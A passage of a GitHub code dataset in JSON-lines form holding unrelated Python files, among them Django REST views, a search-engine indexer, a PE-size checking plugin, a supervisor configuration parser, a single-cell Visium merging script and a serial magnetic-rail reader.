columns=[\"M\",\"tenor\",\"vehicle\",\"label\",\"CMP\",\"ESI\",\"MET\",\"MGD\",\"SRL\",\"MIM\",\"IMS\",\"IMP\",\"FAM\",\"ALT\"]\n columns_dict={k:[]for k in columns}\n lengths=[]\n with open(file,'r') as f:\n f.readline()\n for line in f.readlines():\n line_values=line.split(\",\")\n line_values_numbers=[trim_text(s) for s in \",\".join(line_values[4:]).split(\"\\\"\") if s != ',' and s !='\\n']\n # print(line_values_numbers)\n matches=re.findall('^\\d,|\\\"\\d+,\\d+\\\"|,\\d,|,\\d$', \",\".join(line_values[4:]),overlapped=True)\n if len(matches)!=10:\n print(line)\n continue\n \n lengths.append(len(matches))\n line_values=line_values[:4]+[trim_text(s) for s in matches]\n for j in range(len(columns)):\n if j>2:\n columns_dict[columns[j]].append(float(line_values[j]))\n else:\n columns_dict[columns[j]].append(line_values[j])\n f.close()\n return pd.DataFrame(columns_dict)\n","repo_name":"younader/LiteraryMetaphorDetection","sub_path":"src/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":2299,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"43460087928","text":"from django.contrib.auth import get_user_model\nfrom django.shortcuts import get_object_or_404\nfrom rest_framework import generics\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom .models import LearningSession, QuestionStatistic\nfrom .serializers import (LearningSessionListSerializer,\n LearningSessionSerializer,\n LearningSessionCreateSerializer,\n QuestionStatisticSerializer,\n QuestionStatisticDetailSerializer)\n\nUser = get_user_model()\n\n\nclass LearningSessionListAPIView(generics.ListCreateAPIView):\n serializer_class = LearningSessionCreateSerializer\n\n def get_queryset(self):\n return LearningSession.objects.filter(\n user=self.request.user\n )\n\n def perform_create(self, serializer):\n qs = LearningSession.objects.filter(user=self.request.user)\n for session in qs:\n session.is_active = False\n session.save()\n\n serializer.save(\n user=self.request.user,\n is_active=True\n )\n\n\nclass LearningSessionDetailAPIView(generics.RetrieveAPIView):\n serializer_class = LearningSessionSerializer\n\n def get_queryset(self):\n return LearningSession.objects.filter(\n user=self.request.user\n )\n\n\nclass StatisticsListAPIView(generics.ListAPIView):\n serializer_class = QuestionStatisticSerializer\n\n def get_queryset(self):\n return QuestionStatistic.objects.filter(\n learning_session=self.kwargs.get('pk'))\n\n\nclass StatisticsDetailAPIView(generics.RetrieveAPIView):\n serializer_class = QuestionStatisticDetailSerializer\n\n def get_queryset(self):\n return QuestionStatistic.objects.filter(\n learning_session=self.kwargs.get('pk'))\n\n def get_object(self):\n qs = self.get_queryset()\n return get_object_or_404(qs, id=self.kwargs.get('pk_question'))\n\n\nclass StatisticsAnswerAPIView(APIView):\n \"\"\"GET: Add correct/wrong answer statistics\n /correct/ => correct_answers += 1\n /wrong/ => wrong_answers += 1\n If objects replies <= 0 only return data\n \"\"\"\n\n def get(self, request, pk=None, pk_question=None, answer=None):\n obj = get_object_or_404(QuestionStatistic,\n learning_session=pk,\n id=pk_question\n )\n if obj.replies > 0:\n if answer == 'correct':\n obj.correct_answers += 1\n obj.replies -= 1\n else:\n obj.wrong_answers += 1\n obj.replies += 1\n obj.save()\n\n return Response({'correct_answers': obj.correct_answers,\n 'wrong_answers': obj.wrong_answers,\n 'replies': obj.replies\n })\n\n","repo_name":"mgodkowicz/Django-Testownik","sub_path":"learn/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27089312716","text":"# Authors:\n# Tiago Rainho - 92984\n# Vasco Sousa - 93049\n\n\nimport time\nfrom models.parser import Parser\nfrom models.ranker import RankerFactory,RankingMethod\nfrom models.posting_list import PostingType\nfrom models.spimi import Spimi\nfrom models.tokenizer import Tokenizer\nfrom argparse import ArgumentParser\nimport os\n\ncurrent_time = time.time()\nBLOCK_DIR = 'cache/blocks'\nOUTPUT_INDEX = f'cache/index/{current_time}.index'\nDOC_MAPPING_FILE = f'cache/mappings/docs_mapping_{current_time}.map'\n\n\ndef index(stop_words,min_token_length,language,documents,posting_list_type,max_block_size,max_ram,ranking_method,schema,bm25_k,bm25_b):\n ranker = None\n if ranking_method != None:\n ranker = RankerFactory(ranking_method)(posting_list_type, schema=schema, k=bm25_k, b=bm25_b)\n\n indexer = Spimi(ranker=ranker, max_ram_usage=max_ram, max_block_size=max_block_size,\n auxiliary_dir=BLOCK_DIR, posting_type=posting_list_type)\n \n indexer.extend_metadata({\n 'posting_class': posting_list_type.value,\n 'min_token_length': min_token_length,\n 'stop_words': stop_words,\n 'language': language,\n 'doc_mapping': DOC_MAPPING_FILE\n })\n\n tokenizer = Tokenizer(min_token_length, stop_words, language)\n\n counter:int = 0\n with open(DOC_MAPPING_FILE, 'w', encoding='utf-8') as mapping_file:\n\n for document in documents:\n parser = Parser(document, 'review_id', ['review_headline', 'review_body'])\n parser_generator = parser.parse('\\t')\n\n print(f\"Start {str(posting_list_type).lower().replace('postingtype.','')} indexing...\")\n \n start = time.perf_counter()\n for doc_id, parsed_text in parser_generator:\n tokens = tokenizer.tokenize(parsed_text)\n indexer.add_document(doc_id=counter, tokens=tokens)\n mapping_file.write(f'{counter} {doc_id}\\n')\n counter += 1\n \n index = indexer.construct_index(OUTPUT_INDEX)\n end = time.perf_counter()\n print(\n f\"End file indexing {round((end-start), 3)} seconds with {indexer.block_number} temporary file{'s' if indexer.block_number != 1 else ''}\")\n\n indexer.clear_blocks()\n\n return index\n\ndef parse_args():\n arg_parser = ArgumentParser()\n arg_parser.add_argument(\n \"--stop-words\",\n default=None,\n dest=\"stop_words\",\n help=\"Path to a file that contains a list of stop words\",\n required=False\n )\n arg_parser.add_argument(\n \"--min-token-length\",\n default=0,\n type=int,\n dest=\"min_token_length\",\n help=\"Minimium number of chars that a token must have to be indexed\",\n required=False\n )\n arg_parser.add_argument(\n \"--language\",\n type=str,\n default=None,\n dest=\"language\",\n help=\"Language of the documents, needed to apply snow_stemmer\",\n required=False\n )\n arg_parser.add_argument(\n \"--documents\",\n nargs=\"*\",\n dest=\"documents\",\n help=\"List of paths to the .gz documents that are going to be indexed\",\n required=False\n )\n arg_parser.add_argument(\n \"--posting-list-type\",\n dest=\"posting_list_type\",\n type=PostingType,\n default=PostingType.FREQUENCY,\n help=\"Type of posting list to be used inside the indexer, can be either 'boolean', 'frequency' or 'positional'\",\n required=False\n )\n arg_parser.add_argument(\n \"--max-block-size\",\n dest=\"max_block_size\",\n type=int,\n default=50000,\n help=\"Maximum number of terms inside each temporary block\",\n required=False\n )\n arg_parser.add_argument(\n \"--max-ram\",\n dest=\"max_ram\",\n type=int,\n default=95,\n help=\"Maximum amount of ram usage permited before writting temporary files\",\n required=False\n )\n arg_parser.add_argument(\n \"--ranker\",\n type=RankingMethod,\n dest=\"ranking_method\",\n help=\"Ranking method to use while indexing and searching\",\n required=False,\n default=None\n )\n arg_parser.add_argument(\n \"--k\",\n type=float,\n dest=\"bm25_k\",\n help=\"K value for the BM25 ranking method\",\n required=False,\n default=0.75\n )\n arg_parser.add_argument(\n \"--b\",\n type=float,\n dest=\"bm25_b\",\n help=\"B value for the BM25 ranking method\",\n required=False,\n default=0.5\n )\n arg_parser.add_argument(\n \"--schema\",\n type=str,\n dest=\"schema\",\n help=\"schema for the TF-IDF Ranker\",\n required=False,\n default='lnc.ltc'\n )\n return arg_parser.parse_args()\n\nif __name__ == '__main__':\n # create the auxiliary directories when they do not exist\n os.makedirs(f\"cache\", exist_ok=True)\n for dir in ['blocks', 'index', 'mappings']:\n os.makedirs(f\"cache/{dir}\", exist_ok=True)\n\n args = parse_args()\n index(args.stop_words,args.min_token_length,args.language,args.documents,args.posting_list_type,args.max_block_size,args.max_ram,args.ranking_method,args.schema,args.bm25_k,args.bm25_b)","repo_name":"tiagorainho/SearchEngine","sub_path":"src/indexer.py","file_name":"indexer.py","file_ext":"py","file_size_in_byte":5230,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"1442142561","text":"#! /usr/bin/env python\nfrom pecli.lib.display import display_sections\nfrom pecli.plugins.base import Plugin\n\n\nclass PluginSize(Plugin):\n name = \"checksize\"\n description = \"Check size of the PE file\"\n\n def get_pe_size(self, pe, verbose=True):\n \"\"\"Return the PE size obtained from the file itself\"\"\"\n return max(map(lambda x: x.PointerToRawData + x.SizeOfRawData, pe.sections))\n\n def add_arguments(self, parser):\n parser.add_argument('--quiet', '-q', action='store_true', help='Quiet output')\n parser.add_argument('--extra', '-e', help='Dump extra data in another file')\n parser.add_argument('--write', '-w', help='Copy the file with the right size')\n self.parser = parser\n\n def run(self, args, pe, data):\n if not args.quiet:\n display_sections(pe)\n\n size = self.get_pe_size(pe)\n if len(data) > size:\n print(\"%i bytes of extra data (%i while it should be %i)\" % (\n len(data) - size,\n len(data),\n size\n ))\n if args.write is not None:\n fout = open(args.write, 'wb')\n fout.write(data[:size])\n fout.close()\n print('Correct PE dumped in %s' % args.write)\n if args.extra is not None:\n fout = open(args.extra, 'wb')\n fout.write(data[size:])\n fout.close()\n print('Dumped extra data in %s' % args.extra)\n else:\n if len(data) == size:\n print('Correct size')\n else:\n print(\"File too short (%i while it should be %i)\" % (len(data), size))\n\n if args.write is not None or args.extra is not None:\n print('No extradata, can\\'t do anything for you, sorry!')\n","repo_name":"Te-k/pecli","sub_path":"pecli/plugins/checksize.py","file_name":"checksize.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":75,"dataset":"github-code","pt":"53"} +{"seq_id":"33948646048","text":"from collections import OrderedDict\nfrom socket import gethostname\n\nfrom supervisor.datatypes import boolean, integer, existing_dirpath, byte_size, logging_level, list_of_strings\nfrom supervisor.options import ServerOptions\n\nfrom supvisors.ttypes import ConciliationStrategies, DeploymentStrategies\n\n\n# Options of main section\nclass SupvisorsOptions():\n \"\"\" Holder of the Supvisors options.\n\n Attributes are:\n - address_list: list of host names or IP addresses where supvisors will be running,\n - deployment_file: absolute or relative path to the XML deployment file,\n - internal_port: port number used to publish local events to remote Supvisors instances,\n - event_port: port number used to publish all Supvisors events,\n - auto_fence: when True, Supvisors won't try to reconnect to a Supvisors instance that has been inactive,\n - synchro_timeout: time in seconds that Supvisors waits for all expected Supvisors instances to publish,\n - conciliation_strategy: strategy used to solve conflicts when Supvisors has detected that multiple instances of the same program are running,\n - deployment_strategy: strategy used to start applications on addresses,\n - stats_periods: list of periods for which the statistics will be provided in the Supvisors web page,\n - stats_histo: depth of statistics history,\n - logfile: absolute or relative path of the Supvisors log file,\n - logfile_maxbytes: maximum size of the Supvisors log file,\n - logfile_backups: number of Supvisors backup log files,\n - loglevel: logging level,\n\n - procnumbers: a dictionary giving the number of the program in a homogeneous group.\n \"\"\"\n\n def __init__(self):\n \"\"\" Initialization of the attributes. \"\"\"\n self.procnumbers = {}\n\n def __str__(self):\n \"\"\" Contents as string. \"\"\"\n return ('address_list={} deployment_file={} internal_port={} event_port={} auto_fence={} synchro_timeout={} '\n 'conciliation_strategy={} deployment_strategy={} stats_periods={} stats_histo={} '\n 'logfile={} logfile_maxbytes={} logfile_backups={} loglevel={}'.format(self.address_list,\n self.deployment_file, self.internal_port, self.event_port, self.auto_fence, self.synchro_timeout, \n self.conciliation_strategy, self.deployment_strategy, self.stats_periods, self.stats_histo,\n self.logfile, self.logfile_maxbytes, self.logfile_backups, self.loglevel))\n\n\nclass SupvisorsServerOptions(ServerOptions):\n \"\"\" Class used to parse the options of the 'supvisors' section in the supervisor configuration file.\n\n Attributes are:\n - supvisors_options: the instance holding all Supvisors options,\n - _Section: constant for the name of the Supvisors section in the Supervisor configuration file.\n \"\"\"\n\n _Section = 'supvisors'\n\n def __init__(self):\n \"\"\" Initialization of the attributes. \n Default parameters fit, so realize is called directly. \"\"\"\n ServerOptions.__init__(self)\n self.supvisors_options = SupvisorsOptions()\n\n def _processes_from_section(self, parser, section, group_name, klass=None):\n \"\"\" This method is overriden to store the program number of a homogeneous program.\n This is used in Supervisor to set the real program name from the format defined in the ini file.\n However, Supervisor does not keep this information in its internal structure. \"\"\"\n # call super behaviour\n programs = ServerOptions._processes_from_section(self, parser, section, group_name, klass)\n # store the number of each program\n for idx, program in enumerate(programs):\n self.supvisors_options.procnumbers[program.name] = idx\n # return original result\n return programs\n\n def server_configs_from_parser(self, parser):\n \"\"\" The following has nothing to deal with Supervisor's server configurations.\n It gets Supvisors configuration.\n Supervisor's ServerOptions has not been designed to be specialized.\n This method is overriden just to have an access point to the Supervisor parser. \"\"\"\n configs = ServerOptions.server_configs_from_parser(self, parser)\n # set section\n if not parser.has_section(self._Section):\n raise ValueError('section [{}] not found in ini file {}'.format(self._Section))\n temp, parser.mysection = parser.mysection, self._Section\n # get values\n opt = self.supvisors_options\n opt.address_list = list(OrderedDict.fromkeys(filter(None, list_of_strings(parser.getdefault('address_list', gethostname())))))\n opt.deployment_file = existing_dirpath(parser.getdefault('deployment_file', ''))\n opt.internal_port = self.to_port_num(parser.getdefault('internal_port', '65001'))\n opt.event_port = self.to_port_num(parser.getdefault('event_port', '65002'))\n opt.auto_fence = boolean(parser.getdefault('auto_fence', 'false'))\n opt.synchro_timeout = self.to_timeout(parser.getdefault('synchro_timeout', '15'))\n opt.conciliation_strategy = self.to_conciliation_strategy(parser.getdefault('conciliation_strategy', 'USER'))\n opt.deployment_strategy = self.to_deployment_strategy(parser.getdefault('deployment_strategy', 'CONFIG'))\n # configure statistics\n opt.stats_periods = self.to_periods(list_of_strings(parser.getdefault('stats_periods', '10')))\n opt.stats_histo = self.to_histo(parser.getdefault('stats_histo', 200))\n # configure logger\n opt.logfile = existing_dirpath(parser.getdefault('logfile', '{}.log'.format(self._Section)))\n opt.logfile_maxbytes = byte_size(parser.getdefault('logfile_maxbytes', '50MB'))\n opt.logfile_backups = integer(parser.getdefault('logfile_backups', 10))\n opt.loglevel = logging_level(parser.getdefault('loglevel', 'info'))\n # reset mysection and return original result\n parser.mysection = temp\n return configs\n\n # conversion utils (completion of supervisor.datatypes)\n @staticmethod\n def to_port_num(value):\n \"\"\" Convert a string into a port number. \"\"\"\n value = integer(value)\n if 0 < value <= 65535:\n return value\n raise ValueError('invalid value for port: %d. expected in [1;65535]' % value)\n\n @staticmethod\n def to_timeout(value):\n \"\"\" Convert a string into a timeout value. \"\"\"\n value = integer(value)\n if 0 < value <= 1000:\n return value\n raise ValueError('invalid value for synchro_timeout: %d. expected in [1;1000] (seconds)' % value)\n\n @staticmethod\n def to_conciliation_strategy(value):\n \"\"\" Convert a string into a ConciliationStrategies enum. \"\"\"\n strategy = ConciliationStrategies._from_string(value)\n if strategy is None:\n raise ValueError('invalid value for conciliation_strategy: {}. expected in {}'.format(value, ConciliationStrategies.values()))\n return strategy\n\n @staticmethod\n def to_deployment_strategy(value):\n \"\"\" Convert a string into a DeploymentStrategies enum. \"\"\"\n strategy = DeploymentStrategies._from_string(value)\n if strategy is None:\n raise ValueError('invalid value for deployment_strategy: {}. expected in {}'.format(value, DeploymentStrategies.values()))\n return strategy\n\n @staticmethod\n def to_periods(value):\n \"\"\" Convert a string into a list of period values. \"\"\"\n if len(value) > 3:\n raise ValueError('unexpected number of periods: {}. maximum is 3'.format(value))\n periods = [ ]\n for val in value:\n period = integer(val)\n if 5 > period or period > 3600:\n raise ValueError('invalid value for period: {}. expected in [5;3600] (seconds)'.format(val))\n if period % 5 != 0:\n raise ValueError('invalid value for period: %d. expected multiple of 5' % period)\n periods.append(period)\n return sorted(filter(None, periods))\n\n @staticmethod\n def to_histo(value):\n \"\"\" Convert a string into a value of historic depth. \"\"\"\n histo = integer(value)\n if 10 <= histo <= 1500:\n return histo\n raise ValueError('invalid value for histo: {}. expected in [10;1500] (seconds)'.format(value))\n","repo_name":"danh1979/supvisors","sub_path":"supvisors/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":8381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"32376322213","text":"def save_to_file(file_name, book_search):\n file = open(f\"{file_name}.csv\", \"w\", encoding=\"utf-8-sig\")\n file.write(\"name,author,price,link\\n\")\n\n for info in book_search:\n book_name = info['book_name']\n book_author = info['book_author']\n book_price = info['book_price']\n book_link = info['book_link']\n\n # 가격 정보를 따옴표로 감싸서 저장\n file.write(f\"\\\"{book_name}\\\",\\\"{book_author}\\\",\\\"{book_price}\\\",\\\"{book_link}\\\"\\n\")\n\n file.close()","repo_name":"HOPE-syc/python_web_scraping_study","sub_path":"file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70508034728","text":"# import imp\nfrom string import whitespace\nfrom tkinter import font\nfrom turtle import width\nimport scanpy as sc\nimport scanpy.external as sce\nfrom utils import get_meta_data\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom pathlib import Path\nimport utils\nimport os\nimport argparse\nimport warnings\n\n\nwarnings.simplefilter(action='ignore')\nsc.settings.verbosity = 0\n\n'''\nOpen all samples QC processed files, merge them\n'''\n\n############################### BOOOORIING STUFF BELOW ############################### \n# Warning settings\nwarnings.simplefilter(action='ignore')\nsc.settings.verbosity = 0\n# Set figure params\nsc.set_figure_params(scanpy=True, facecolor=\"white\", fontsize=8, dpi=80, dpi_save=300)\nplt.rcParams['figure.constrained_layout.use'] = True\n# Read command line and set args\nparser = argparse.ArgumentParser(prog='merge', description='Run Merging')\nparser.add_argument('-i', '--input_dir', help='Input directory containing the preprocessed AnnData object ', required=True)\nparser.add_argument('-o', '--output_dir', help='Output directory where to store the processed object', required=True)\nparser.add_argument('-n', '--normalization', default=\"log1p\", help='Normalization technique', required=False)\nparser.add_argument('-an', '--analysis_name', help='Analysis name', required=True)\nargs = vars(parser.parse_args())\ninput_path = args['input_dir']\noutput_path = args['output_dir']\nnormalization = args['normalization']\nanalysis_name = args['analysis_name'] # \"visium_merge\"\n# Get necesary paths and create folders if necessary\nS_PATH, DATA_PATH, OUT_DATA_PATH, PLOT_PATH = utils.set_n_return_paths(analysis_name)\n############################### BOOOORIING STUFF ABOVE ###############################\n\nsample_type = \"visium\"\n# Load meta data\nmeta = utils.get_meta_data(sample_type)\nsamples = np.unique(meta['sample_id'])\n\n# put the samples in a list\n# mpl.rcParams['figure.dpi']= 150\n\nmarkers_df = pd.read_csv(os.path.join(DATA_PATH, \"marker_genes.txt\"), sep=\"\\t\")\nmarkers = list(set(markers_df[\"genesymbol\"].str.capitalize()))\n\nadatas = []\n\nadata = []\n# for sample in os.listdir(input_path):\nfor sample in samples:\n\n tmp = sc.read_h5ad(os.path.join(input_path,f\"{sample}_filtered.h5ad\"))\n\n # Fetch sample metadata\n m = meta[meta['sample_id'] == sample]\n \n # Add metadata to adata\n for col in m.columns:\n tmp.obs[col] = m[col].values[0]\n\n # Append\n adata.append(tmp)\n del tmp\n \n# Merge objects and delete list\nadata = adata[0].concatenate(adata[1:], join='outer')\nsc.pp.calculate_qc_metrics(adata, inplace=True)\n\n\n\"\"\"\nfig, axes = plt.subplots(1, 6, figsize=(12, 6))\nfor ax, sample in zip(axes, samples):\n\n adata = sc.read_h5ad(os.path.join(input_path,f\"{sample}_filtered.h5ad\"))\n # adata.var.index = pd.Index(gen.capitalize() for gen in tmp.var.index.values)\n sc.experimental.pp.highly_variable_genes(\n adata, flavor=\"pearson_residuals\", n_top_genes=4000\n )\n \n # Fetch sample metadata\n m = meta[meta['sample_id'] == sample] \n # Add metadata to adata\n for col in m.columns:\n adata.obs[col] = m[col].values[0]\n \n hvgs = adata.var[\"highly_variable\"]\n # print(hvgs)\n ax.scatter(\n adata.var[\"mean_counts\"], adata.var[\"residual_variances\"], s=3, edgecolor=\"none\"\n )\n ax.scatter(\n adata.var[\"mean_counts\"][hvgs],\n adata.var[\"residual_variances\"][hvgs],\n c=\"tab:red\",\n label=\"selected genes\",\n s=3,\n edgecolor=\"none\",\n )\n ax.scatter(\n adata.var[\"mean_counts\"][np.isin(adata.var_names, markers)],\n adata.var[\"residual_variances\"][np.isin(adata.var_names, markers)],\n c=\"k\",\n label=\"known marker genes\",\n s=10,\n edgecolor=\"none\",\n )\n ax.set_xscale(\"log\")\n ax.set_xlabel(\"mean expression\")\n ax.set_yscale(\"log\")\n ax.set_ylabel(\"residual variance\")\n # print(adata.obs[\"condition\"][0])\n # ax.set_title(adata.uns[\"name\"])\n ax.set_title(adata.obs[\"condition\"][0])\n\n ax.spines[\"right\"].set_visible(False)\n ax.spines[\"top\"].set_visible(False)\n ax.yaxis.set_ticks_position(\"left\")\n ax.xaxis.set_ticks_position(\"bottom\")\n\n adatas.append(adata)\n del adata\n\nplt.legend()\n\n\nfor adata in adatas:\n adata = adata[:, adata.var[\"highly_variable\"]]\n sc.experimental.pp.normalize_pearson_residuals(adata)\n\n\nfor adata in adatas:\n # Run PCA\n sc.pp.scale(adata)\n sc.tl.pca(adata, svd_solver='arpack', random_state=0)\n n_cells = len(adata)\n \n\nfor adata in adatas:\n sc.pp.neighbors(adata)\n sc.tl.umap(adata)\n sc.tl.leiden(adata)\n\nfor adata in adatas:\n print(adata.obs[\"condition\"][0], \":\")\n sc.pl.umap(adata, color=[\"leiden\"], cmap=\"tab20\")\n sc.pl.umap(adata, color=list(set(adata.var.index) & set(markers)), layer=\"sqrt_norm\")\n\"\"\"\n\n\nsc.pl.violin(adata, ['n_genes_by_counts', 'total_counts'],\n wspace=0.3, jitter=0.4, size=0.5, groupby=\"condition\", rotation=75, show=True, save=f\"QC_on_merged_objects_after_filtering_{sample_type}_violin.pdf\")\n\n# adata.obs['outlier_total'] = adata.obs.total_counts > 30000\n# print('%u cells with large total counts' % (sum(adata.obs['outlier_total'])))\n# adata_pbmc3k = adata[~adata.obs['outlier_total'], :]\n\n# keep raw counts in layers\nadata.layers['counts'] = adata.X.copy()\nadata.layers[\"sqrt_norm\"] = np.sqrt(\n sc.pp.normalize_total(adata, inplace=False)[\"X\"]).copy()\n\nadata.layers[\"log1p_transformed\"] = sc.pp.normalize_total(adata, inplace=False, target_sum=1e6)[\"X\"]\nsc.pp.log1p(adata, layer=\"log1p_transformed\")\n\n\n\n\"\"\"\n# TODO: Try other normalization techniques\nif normalization == \"log1p\":\n\n # Log-normalize expression\n sc.pp.normalize_total(adata, target_sum=1e6)\n sc.pp.log1p(adata)\n adata.layers['normalized'] = adata.X\nelif normalization == \"pearson\":\n sc.experimental.pp.highly_variable_genes(\n adata, batch_key='batch', flavor=\"pearson_residuals\", n_top_genes=3000\n )\nelse:\n # TODO: throw an error\n pass\n # throw NotImplementedError \"\"\"\n\n\n# 4000 di\n# adata.var.index = pd.Index(gen.capitalize() for gen in tmp.var.index.values)\nsc.experimental.pp.highly_variable_genes(\n adata, batch_key='batch', flavor=\"pearson_residuals\", n_top_genes=3000\n)\n\n\n\nfig, ax = plt.subplots(1, 1, figsize=(12, 6))\nhvgs = adata.var[\"highly_variable\"]\n\nax.scatter(\n adata.var[\"mean_counts\"], adata.var[\"residual_variances\"], s=3, edgecolor=\"none\"\n)\nax.scatter(\n adata.var[\"mean_counts\"][hvgs],\n adata.var[\"residual_variances\"][hvgs],\n c=\"tab:red\",\n label=\"selected genes\",\n s=3,\n edgecolor=\"none\",\n)\nax.scatter(\n adata.var[\"mean_counts\"][np.isin(adata.var_names, markers)],\n adata.var[\"residual_variances\"][np.isin(adata.var_names, markers)],\n c=\"k\",\n label=\"known marker genes\",\n s=10,\n edgecolor=\"none\",\n)\nax.set_xscale(\"log\")\nax.set_xlabel(\"mean expression\")\nax.set_yscale(\"log\")\nax.set_ylabel(\"residual variance\")\n# ax.set_title(adata.obs[\"condition\"][0])\n\nax.spines[\"right\"].set_visible(False)\nax.spines[\"top\"].set_visible(False)\nax.yaxis.set_ticks_position(\"left\")\nax.xaxis.set_ticks_position(\"bottom\")\nplt.legend()\n\ntxt=\"In the figure below, red dots show the selected genes (i.e. highly variable genes) and the black ones represent the marker genes.\"\nplt.figtext(0.5, 1.0, txt, wrap=True, horizontalalignment='left', fontsize=12)\nplt.show();\n# Compute HVG\n# sc.experimental.pp.highly_variable_genes(adata, batch_key='batch', n_top_genes=4000)\n# sc.pl.highly_variable_genes(adata, save=f'{sample_type}_merged_hvg.pdf')\n# plt.show()\n\nadata.var = adata.var[['highly_variable','highly_variable_nbatches']]\n\n# Filter by HVG\nnum_hvg_genes = 5000\nbatch_msk = np.array(adata.var.highly_variable_nbatches > 1)\nhvg = adata.var[batch_msk].sort_values('highly_variable_nbatches').tail(num_hvg_genes).index\nadata.var['highly_variable'] = [g in hvg for g in adata.var.index]\nadata.var = adata.var[['highly_variable','highly_variable_nbatches']]\nadata = adata[:,hvg]\n\nprint(\"Performing analytic Pearson residual normalization...\")\nsc.experimental.pp.normalize_pearson_residuals(adata)\n\n# print(adata.X)\n\n# Run PCA\n# sc.pp.scale(adata)\n\nsc.tl.pca(adata, svd_solver='arpack', random_state=0)\n\n# Get loadings for each gene for each PC\ndf_loadings = pd.DataFrame(adata.varm['PCs'], index=adata.var_names)\n# get rank of each loading for each PC\ndf_rankings = pd.DataFrame((-1 * df_loadings.values).argsort(0).argsort(0), index=df_loadings.index, columns=df_loadings.columns)\n# c.f. with df_loadings.apply(scipy.stats.rankdata, axis=0)\n# evaluate \n# print(\"Top loadings for PC1...\")\n# print(df_loadings[0].sort_values().tail())\n# print(\"Rank of IKZF1 for first 5 PCs...\")\n# print(df_rankings.loc[\"IKZF1\"].head())\n\n\"\"\"sc.pl.pca_overview(adata, color='sample_id', show=False, save=f'{sample_type}_pca_overview.pdf')\n\nsc.pl.pca_loadings(adata, components=[1,2,3,4,5,6,7,8], show=False, save=f'{sample_type}_pca_loadings.pdf')\n\nsc.pl.pca_variance_ratio(adata, n_pcs = 50, show=False, save=f'{sample_type}_variance_ratio.pdf')\"\"\"\n\nprint(\"Computing neighbors...\")\n# Run UMAP to see the difference after integration\nsc.pp.neighbors(adata)\nprint(\"\\nUMAP of merged objects before integration\")\nsc.tl.umap(adata)\nsc.pl.umap(adata, color=[\"condition\"], palette=sc.pl.palettes.default_20, save=f'{sample_type}_merged_condition.pdf');\nplt.show();\n\n# plt.clf()\nprint(\"Saving the merged object...\")\n# Write to file\nadata.write(os.path.join(output_path, f'{sample_type}_merged.h5ad'))\n\n\n# python vis_merge.py -i ../data/out_data -o ../data/out_data","repo_name":"saezlab/CRCDiet","sub_path":"bin/vis_merge.py","file_name":"vis_merge.py","file_ext":"py","file_size_in_byte":9551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72213646887","text":"a = open('asia.txt','r') #The first reference point\n\nb = open('europe.txt', 'r') #The second reference point\n\nc = open('africa.txt', 'r') #The third reference point\n\nd = open('america.txt', 'r') #The fourth reference point\n\nreferences = (a.read(), b.read(), c.read(), d.read())\n\ne = open('unknown.txt', 'r') #The genome we are trying to determine\ncheck = e.read()\n\n#For the purposes of this program, we will assume all strings are of identical length\n\nrefDiff = (0, 0, 0, 0) #These 4 integers will record the number of differences between unknown and the four reference points\n\nfor i in range(len(check)):\n for j in range(len(refDiff)):\n if e[i] != references[j][i]:\n refDiff[j] = refDiff[j] + 1\n","repo_name":"coding4medicine/advanced-class-2018","sub_path":"alex/checkAncestr.py","file_name":"checkAncestr.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25348059622","text":"# -*- coding: utf-8 -*-\n\n#############################################################################\n# python magnetic_rail\n# by Kevin Chiu 2020\n#############################################################################\n\nimport numpy as np\nimport serial\nimport time\nimport sys\n\ng_ser_magnet = serial.Serial('/dev/ttyUSB0', 115200, bytesize=8,\n parity=serial.PARITY_EVEN, stopbits=1, timeout=0.07)\n\n\ndef magnetFuc():\n num = None\n offset = None\n width = None\n\n data_raw = g_ser_magnet.read()\n\n # int_raw = int.from_bytes(data_raw, byteorder='big')\n int_raw = int(data_raw.encode('hex'), 16)\n\n num = int_raw//64\n id = int_raw % 64\n\n if(id == 57 and num == 1):\n data_raw1 = g_ser_magnet.read()\n data_raw2 = g_ser_magnet.read()\n # int_raw1 = int.from_bytes(data_raw1, byteorder='big')\n # int_raw2 = int.from_bytes(data_raw2, byteorder='big')\n int_raw1 = int(data_raw1.encode('hex'), 16)\n int_raw2 = int(data_raw2.encode('hex'), 16)\n P_N = (int_raw1 & 64) >> 6\n if(P_N == 1):\n offset = int_raw1 & 63\n else:\n offset = -(int_raw1 & 63)\n width = (((int_raw2 & 192) >> 2)+((int_raw2 & 63)-41))*2\n\n elif(id == 57 and num != 0):\n data_raw1 = g_ser_magnet.read()\n # int_raw1 = int.from_bytes(data_raw1, byteorder='big')\n int_raw1 = int(data_raw1.encode('hex'), 16)\n P_N = (int_raw1 & 64) >> 6\n if(P_N == 1):\n offset = int_raw1 & 63\n else:\n offset = -(int_raw1 & 63)\n\n # print(\"num:{} offset:{} width:{}\".format(num, offset, width))\n return num, offset, width\n\n\nwhile 1:\n num, offset, width = magnetFuc()\n print(\"num:{} offset:{} width:{}\".format(num, offset, width))\n","repo_name":"kev1nCh1u/ivam-ros-agricultural-vehicles","sub_path":"test/magnetic_rail/magnetic_rail_py2.py","file_name":"magnetic_rail_py2.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20613264151","text":"import os\n\nfrom google.protobuf.text_format import ParseError\nimport pytest\n\nfrom nvidia_tao_tf1.cv.detectnet_v2.spec_handler.spec_loader import 